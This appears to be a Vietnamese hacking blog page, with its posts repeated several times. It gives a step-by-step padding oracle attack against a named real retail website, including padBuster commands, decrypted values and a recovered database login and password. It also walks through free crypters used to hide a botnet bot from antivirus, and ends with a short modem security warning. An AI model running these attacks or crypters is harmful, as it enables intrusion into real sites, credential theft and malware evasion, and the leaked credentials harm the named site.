Tình trạng: Đã gửi mail để báo lỗi cho Quản trị viên!

Soft mien phi ,hoc tap ,hack website,hack game,tai lieu aptech,du an,project thong tin dai hoc ,ung dung androind
Tuesday, August 21, 2012
[TUT] Padding Oracle Attack
Victim: http://bigc.vn/
Kiểm tra lỗi Padding Orale

View source:
Chú ý đoạn code sau:
/WebResource.axd?d=OpduU2rj_NJHaBhjNiUZ7g2&t=63 4538991637902500"
Bước 1: Chuẩn bị Tools
Trước tiên cần cài đặt perl:
http://www.activestate.com/activeperl/downloads
Coppy 2 file padBuster.pl và Web.config_bruter.pl sau vào ổ C:
padBuster.pl:
http://www.mediafire.com/?a0auo2tca0ffdfe
Web.config_bruter.pl:
http://www.mediafire.com/?3twc9xwizdcdw8p
pass unlock: soleil_vhb
pass giải nén: ceh.vn
Bước 2: Thực hiện lệnh trên CMD
vào Run command
Cd\
Chạy lệnh:
padBuster.pl http://bigc.vn/WebResource.axd?d=Opd...NJHaBhjNiUZ7g2 OpduU2rj_NJHaBhjNiUZ7g2 8 -encoding 3 -plaintext "|||~/web.config"

Đến bước này đợi 1 lát, nó sẽ chạy cho đến dòng:
“The ID# marked with ** is recommended: “
Lúc này ta sẽ nhập số 2 và ấn enter

Chờ đợi tầm 30 phút chương trình sẽ giải mã ra giá trị sau:
M0-Q6vb5oiWPYJMC3WdcQgAAAAAAAAAA0

Sau khi có giá trị kết quả giải mã, thực hiện tiếp câu lệnh:
Web.config_bruter.pl http://bigc.vn/WebResource.axd M0-Q6vb5oiWPYJMC3WdcQgAAAAAAAAAA0 8
Đợi chương trình biên dịch xong ( Tầm 1 tiếng ) ta sẽ có kết quả như sau:

Kết quả:
u2LzoCD0ZcozT5Dq9vm iJY9gkwLdZ1xCAAAAAAAAAAA1
gPdbQmmzWIEzT5Dq9vmiJY9gkwLdZ1xCAAAAAAAAAAA1
Mỗi lần biên dịch, chương trình sẽ cho ra 1 giá trị khác nhau nhưng link đều đưa về cùng 1 kết quả
Bước 3: Lấy thông tin file config:
http://bigc.vn/ScriptResource.axd?d=...xCAAAAAAAAAAA1
hoặc:
http://bigc.vn/ScriptResource.axd?d=...xCAAAAAAAAAAA1
Ta được thông tin sau: ID=bigc;Password=RrmX6W6ODi

Bước 4: login vào Database
Sử dụng tool: MySQL management studio express
http://www.scottsystems.com/products..._ce/downloads/

Slide: http://www.mediafire.com/view/?u1qczh2b7ip45sw
Kiểm tra lỗi Padding Orale

View source:
Chú ý đoạn code sau:
/WebResource.axd?d=OpduU2rj_NJHaBhjNiUZ7g2&t=63 4538991637902500"
Bước 1: Chuẩn bị Tools
Trước tiên cần cài đặt perl:
http://www.activestate.com/activeperl/downloads
Coppy 2 file padBuster.pl và Web.config_bruter.pl sau vào ổ C:
padBuster.pl:
http://www.mediafire.com/?a0auo2tca0ffdfe
Web.config_bruter.pl:
http://www.mediafire.com/?3twc9xwizdcdw8p
pass unlock: soleil_vhb
pass giải nén: ceh.vn
Bước 2: Thực hiện lệnh trên CMD
vào Run command
Cd\
Chạy lệnh:
padBuster.pl http://bigc.vn/WebResource.axd?d=Opd...NJHaBhjNiUZ7g2 OpduU2rj_NJHaBhjNiUZ7g2 8 -encoding 3 -plaintext "|||~/web.config"

Đến bước này đợi 1 lát, nó sẽ chạy cho đến dòng:
“The ID# marked with ** is recommended: “
Lúc này ta sẽ nhập số 2 và ấn enter

Chờ đợi tầm 30 phút chương trình sẽ giải mã ra giá trị sau:
M0-Q6vb5oiWPYJMC3WdcQgAAAAAAAAAA0

Sau khi có giá trị kết quả giải mã, thực hiện tiếp câu lệnh:
Web.config_bruter.pl http://bigc.vn/WebResource.axd M0-Q6vb5oiWPYJMC3WdcQgAAAAAAAAAA0 8
Đợi chương trình biên dịch xong ( Tầm 1 tiếng ) ta sẽ có kết quả như sau:

Kết quả:
u2LzoCD0ZcozT5Dq9vm iJY9gkwLdZ1xCAAAAAAAAAAA1
gPdbQmmzWIEzT5Dq9vmiJY9gkwLdZ1xCAAAAAAAAAAA1
Mỗi lần biên dịch, chương trình sẽ cho ra 1 giá trị khác nhau nhưng link đều đưa về cùng 1 kết quả
Bước 3: Lấy thông tin file config:
http://bigc.vn/ScriptResource.axd?d=...xCAAAAAAAAAAA1
hoặc:
http://bigc.vn/ScriptResource.axd?d=...xCAAAAAAAAAAA1
Ta được thông tin sau: ID=bigc;Password=RrmX6W6ODi

Bước 4: login vào Database
Sử dụng tool: MySQL management studio express
http://www.scottsystems.com/products..._ce/downloads/

Slide: http://www.mediafire.com/view/?u1qczh2b7ip45sw
[TUT] Padding Oracle Attack
Victim: http://bigc.vn/
Kiểm tra lỗi Padding Orale

View source:
Chú ý đoạn code sau:
/WebResource.axd?d=OpduU2rj_NJHaBhjNiUZ7g2&t=63 4538991637902500"
Bước 1: Chuẩn bị Tools
Trước tiên cần cài đặt perl:
http://www.activestate.com/activeperl/downloads
Coppy 2 file padBuster.pl và Web.config_bruter.pl sau vào ổ C:
padBuster.pl:
http://www.mediafire.com/?a0auo2tca0ffdfe
Web.config_bruter.pl:
http://www.mediafire.com/?3twc9xwizdcdw8p
pass unlock: soleil_vhb
pass giải nén: ceh.vn
Bước 2: Thực hiện lệnh trên CMD
vào Run command
Cd\
Chạy lệnh:
padBuster.pl http://bigc.vn/WebResource.axd?d=Opd...NJHaBhjNiUZ7g2 OpduU2rj_NJHaBhjNiUZ7g2 8 -encoding 3 -plaintext "|||~/web.config"

Đến bước này đợi 1 lát, nó sẽ chạy cho đến dòng:
“The ID# marked with ** is recommended: “
Lúc này ta sẽ nhập số 2 và ấn enter

Chờ đợi tầm 30 phút chương trình sẽ giải mã ra giá trị sau:
M0-Q6vb5oiWPYJMC3WdcQgAAAAAAAAAA0

Sau khi có giá trị kết quả giải mã, thực hiện tiếp câu lệnh:
Web.config_bruter.pl http://bigc.vn/WebResource.axd M0-Q6vb5oiWPYJMC3WdcQgAAAAAAAAAA0 8
Đợi chương trình biên dịch xong ( Tầm 1 tiếng ) ta sẽ có kết quả như sau:

Kết quả:
u2LzoCD0ZcozT5Dq9vm iJY9gkwLdZ1xCAAAAAAAAAAA1
gPdbQmmzWIEzT5Dq9vmiJY9gkwLdZ1xCAAAAAAAAAAA1
Mỗi lần biên dịch, chương trình sẽ cho ra 1 giá trị khác nhau nhưng link đều đưa về cùng 1 kết quả
Bước 3: Lấy thông tin file config:
http://bigc.vn/ScriptResource.axd?d=...xCAAAAAAAAAAA1
hoặc:
http://bigc.vn/ScriptResource.axd?d=...xCAAAAAAAAAAA1
Ta được thông tin sau: ID=bigc;Password=RrmX6W6ODi

Bước 4: login vào Database
Sử dụng tool: MySQL management studio express
http://www.scottsystems.com/products..._ce/downloads/

Slide: http://www.mediafire.com/view/?u1qczh2b7ip45sw
Kiểm tra lỗi Padding Orale

View source:
Chú ý đoạn code sau:
/WebResource.axd?d=OpduU2rj_NJHaBhjNiUZ7g2&t=63 4538991637902500"
Bước 1: Chuẩn bị Tools
Trước tiên cần cài đặt perl:
http://www.activestate.com/activeperl/downloads
Coppy 2 file padBuster.pl và Web.config_bruter.pl sau vào ổ C:
padBuster.pl:
http://www.mediafire.com/?a0auo2tca0ffdfe
Web.config_bruter.pl:
http://www.mediafire.com/?3twc9xwizdcdw8p
pass unlock: soleil_vhb
pass giải nén: ceh.vn
Bước 2: Thực hiện lệnh trên CMD
vào Run command
Cd\
Chạy lệnh:
padBuster.pl http://bigc.vn/WebResource.axd?d=Opd...NJHaBhjNiUZ7g2 OpduU2rj_NJHaBhjNiUZ7g2 8 -encoding 3 -plaintext "|||~/web.config"

Đến bước này đợi 1 lát, nó sẽ chạy cho đến dòng:
“The ID# marked with ** is recommended: “
Lúc này ta sẽ nhập số 2 và ấn enter

Chờ đợi tầm 30 phút chương trình sẽ giải mã ra giá trị sau:
M0-Q6vb5oiWPYJMC3WdcQgAAAAAAAAAA0

Sau khi có giá trị kết quả giải mã, thực hiện tiếp câu lệnh:
Web.config_bruter.pl http://bigc.vn/WebResource.axd M0-Q6vb5oiWPYJMC3WdcQgAAAAAAAAAA0 8
Đợi chương trình biên dịch xong ( Tầm 1 tiếng ) ta sẽ có kết quả như sau:

Kết quả:
u2LzoCD0ZcozT5Dq9vm iJY9gkwLdZ1xCAAAAAAAAAAA1
gPdbQmmzWIEzT5Dq9vmiJY9gkwLdZ1xCAAAAAAAAAAA1
Mỗi lần biên dịch, chương trình sẽ cho ra 1 giá trị khác nhau nhưng link đều đưa về cùng 1 kết quả
Bước 3: Lấy thông tin file config:
http://bigc.vn/ScriptResource.axd?d=...xCAAAAAAAAAAA1
hoặc:
http://bigc.vn/ScriptResource.axd?d=...xCAAAAAAAAAAA1
Ta được thông tin sau: ID=bigc;Password=RrmX6W6ODi

Bước 4: login vào Database
Sử dụng tool: MySQL management studio express
http://www.scottsystems.com/products..._ce/downloads/

Slide: http://www.mediafire.com/view/?u1qczh2b7ip45sw
Một số phần mền Mã Hóa Virus Free
1- 07-12-12 Crypter
- Click vào file và chọn path tới file virus
- Click vào stub và chọn path tới file stub.exe ( cùng thư mục với file 07-12-12 Crypter.exe )
- Sau đó tùy chọn các chức năng và Encrypt
- Trong trường hợp này Soleil sẽ lấy demo với file virus là con bot được tạo từ tool botnet Di5
- Với con bot này thì nó bị phát hiện 31/42 phần mền anti virus.
- Hình ảnh con bot di5 sau khi được mã hóa với 07-12-12 Crypter. Nó đã bypass anti được 1 nửa và chỉ còn bị phát hiện 15/42 phần mền anti virus.
-
Link download: http://www.mediafire.com/?3pdsmkkto519lzc
2- Haxor – Aio
- Tool này có nhiều chức năng hơn so với tool 07-12-12 Crypter như binder, extension Spoofer, Icon changer…
- Click vào Crypter chọn path file virus, Soleil sẽ lấy ví dụ đôi với con bot Di5 như ở trên.
- Khi mã hóa con bot của di5 đó với Haxor – Aio thì chỉ còn 9/42 phần mền antivirus phát hiện, 1 kết quả không tồi.
- Hình ảnh demo:
3- Chrome Crypter v2
- Browse thư nhất dùng để dẫn tới path file virus
- Browse thứ 2 dùng để change icon cho virus
- Browse thứ 3 dùng để gắn virus vào 1 chương trình ( binder)
- Cũng với con bot tạo bởi Di5 đó, khi được mã hóa với Chrome Crypter v.2 thì còn 18/42 phần mền antivirus phát hiện
- Hình ảnh demo:
4- Amnesia
- Tool encrypt Amnesia này rất đầy đủ các chưc năng như thay đổi icon, đính kèm phần mền, thể hiện thông báo, download, spoofer, pumper… Trong các tool free thì tool này soleil cũng khá kết nhất với các chức năng của nó.
- Khả năng bypass của nó cũng khá tốt, chỉ còn 10/41 phần mền anti phát hiện đối với con bot được tạo bởi Di5.
Toàn bộ pass các link download trên (nếu có ):
pass unlock: soleil_vhb
pass giải nén: ceh.vn
Đây là những Tool free, Vì vậy bài tut này mang tính chất giới thiệu và tham khảo, không hứa hẹn kỳ vọng nhiều về việc ứng dụng nó. Thực chất hiện giờ chỉ cần mã hóa qua đc kis, bkav, cmc, avg, avira là xem như đã thành công. Trong bài tut tiếp theo về mã hóa Soleil sẽ demo mã hóa FUD theo phương thức hexing! Tuy phức tạp 1 chút nhưng thu được kết quả mĩ mãn hơn. ^^
Một số phần mền Mã Hóa Virus Free
1- 07-12-12 Crypter
- Click vào file và chọn path tới file virus
- Click vào stub và chọn path tới file stub.exe ( cùng thư mục với file 07-12-12 Crypter.exe )
- Sau đó tùy chọn các chức năng và Encrypt
- Trong trường hợp này Soleil sẽ lấy demo với file virus là con bot được tạo từ tool botnet Di5
- Với con bot này thì nó bị phát hiện 31/42 phần mền anti virus.
- Hình ảnh con bot di5 sau khi được mã hóa với 07-12-12 Crypter. Nó đã bypass anti được 1 nửa và chỉ còn bị phát hiện 15/42 phần mền anti virus.
-
Link download: http://www.mediafire.com/?3pdsmkkto519lzc
2- Haxor – Aio
- Tool này có nhiều chức năng hơn so với tool 07-12-12 Crypter như binder, extension Spoofer, Icon changer…
- Click vào Crypter chọn path file virus, Soleil sẽ lấy ví dụ đôi với con bot Di5 như ở trên.
- Khi mã hóa con bot của di5 đó với Haxor – Aio thì chỉ còn 9/42 phần mền antivirus phát hiện, 1 kết quả không tồi.
- Hình ảnh demo:
3- Chrome Crypter v2
- Browse thư nhất dùng để dẫn tới path file virus
- Browse thứ 2 dùng để change icon cho virus
- Browse thứ 3 dùng để gắn virus vào 1 chương trình ( binder)
- Cũng với con bot tạo bởi Di5 đó, khi được mã hóa với Chrome Crypter v.2 thì còn 18/42 phần mền antivirus phát hiện
- Hình ảnh demo:
4- Amnesia
- Tool encrypt Amnesia này rất đầy đủ các chưc năng như thay đổi icon, đính kèm phần mền, thể hiện thông báo, download, spoofer, pumper… Trong các tool free thì tool này soleil cũng khá kết nhất với các chức năng của nó.
- Khả năng bypass của nó cũng khá tốt, chỉ còn 10/41 phần mền anti phát hiện đối với con bot được tạo bởi Di5.
Toàn bộ pass các link download trên (nếu có ):
pass unlock: soleil_vhb
pass giải nén: ceh.vn
Đây là những Tool free, Vì vậy bài tut này mang tính chất giới thiệu và tham khảo, không hứa hẹn kỳ vọng nhiều về việc ứng dụng nó. Thực chất hiện giờ chỉ cần mã hóa qua đc kis, bkav, cmc, avg, avira là xem như đã thành công. Trong bài tut tiếp theo về mã hóa Soleil sẽ demo mã hóa FUD theo phương thức hexing! Tuy phức tạp 1 chút nhưng thu được kết quả mĩ mãn hơn. ^^
Xâm nhập máy tính thông qua Yahoo Messenger hoặc IP
Hôm rồi mình có tạo 1 site để get địa chỉ IP của người dùng yahoo... Trong quá trình tạo site và test mình thấy có khá nhiều lỗ hổng ở việc thiết lập các modem hiện nay. Thông qua các lỗ hổng này các hacker có thể :
Lấy được thông tin về mật khẩu Yahoo, Gmail, ... và hàng loạt trang khác.
Thay đổi DNS (Domain Name Server) mặc định (cực kì nguy hiểm - Có thể biến google.com thành site chứa mã độc).
Ăn cắp thẻ tín dụng, tài khoản game ... (thông qua thay đổi DNS server và dựng nên các site mạo danh ngân hàng, Ebank, hệ thống thanh toán trực tuyến).
Ngắt kết nối mạng của người dùng
Moi thông tin cá nhân của người dùng đó
Trong thời gian này mình khuyên các bạn nên kiểm tra lại thiết đặt modem... bằng cách sau
Thay đổi mật khẩu mặc định của modem (tốt nhất là mật khẩu trên 9 kí tự).
Đóng các port của modem nếu không thật sự cần thiết.
Modem đặc biệt dễ bị dính loại này là TD 8870 của VNPT. Viettel và FPT cũng không ngoại lệ.
Mong anh em cẩn thận.
Lấy được thông tin về mật khẩu Yahoo, Gmail, ... và hàng loạt trang khác.
Thay đổi DNS (Domain Name Server) mặc định (cực kì nguy hiểm - Có thể biến google.com thành site chứa mã độc).
Ăn cắp thẻ tín dụng, tài khoản game ... (thông qua thay đổi DNS server và dựng nên các site mạo danh ngân hàng, Ebank, hệ thống thanh toán trực tuyến).
Ngắt kết nối mạng của người dùng
Moi thông tin cá nhân của người dùng đó
Trong thời gian này mình khuyên các bạn nên kiểm tra lại thiết đặt modem... bằng cách sau
Thay đổi mật khẩu mặc định của modem (tốt nhất là mật khẩu trên 9 kí tự).
Đóng các port của modem nếu không thật sự cần thiết.
Modem đặc biệt dễ bị dính loại này là TD 8870 của VNPT. Viettel và FPT cũng không ngoại lệ.
Mong anh em cẩn thận.








